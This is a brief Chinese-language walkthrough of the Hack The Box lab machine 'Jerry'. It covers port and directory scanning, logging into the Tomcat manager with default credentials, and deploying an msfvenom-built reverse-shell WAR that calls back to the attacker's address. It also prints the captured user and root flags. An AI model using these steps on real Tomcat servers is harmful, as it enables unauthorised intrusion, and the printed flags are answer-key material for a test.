杰瑞#
尽管杰瑞是 Hack The Box 上较简单的机器之一,但它是现实的,因为 Apache Tomcat 通常会暴露并配置有常见或弱密码。
ip 地址:10.10.10.95
task1 远程主机开放了什么端口。
通过 nmap 进行扫描,识别端口开发情况
nmap -sV 10.10.10.95
task2 远程主机运行了什么服务?
由 nmap 扫描结果可以,是 Apache Tomcat
task3 Web 服务器上哪个相对路径通向 Web 应用程序管理器?
dirsearch -u http://10.10.10.95:8080/
测试后发现是 /manager/html
,目录扫描就可以扫出来
task4 哪个有效的用户名和密码组合可用于认证进入 Tomcat Web 应用程序管理器?请以 username 的格式给出答案。
admin/admin 登录后
tomcat
task5 什么类型的文件可以部署到服务器上?
当然是 war 包。
task 提交 user 的 flag
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war
点击 http://10.10.10.95:8080/shell/
反弹会 shell
这种文件要怎么读取?
type *.txt
有两个 flag
user flag:7004dbcef0f854e0fb401875f26ebd00
task 提交 root 的 flag
04a8b36e1545a455393d067e772fe90e
http://10.10.10.95:8080/manager/status
以为有 ajp 任意文件读取呢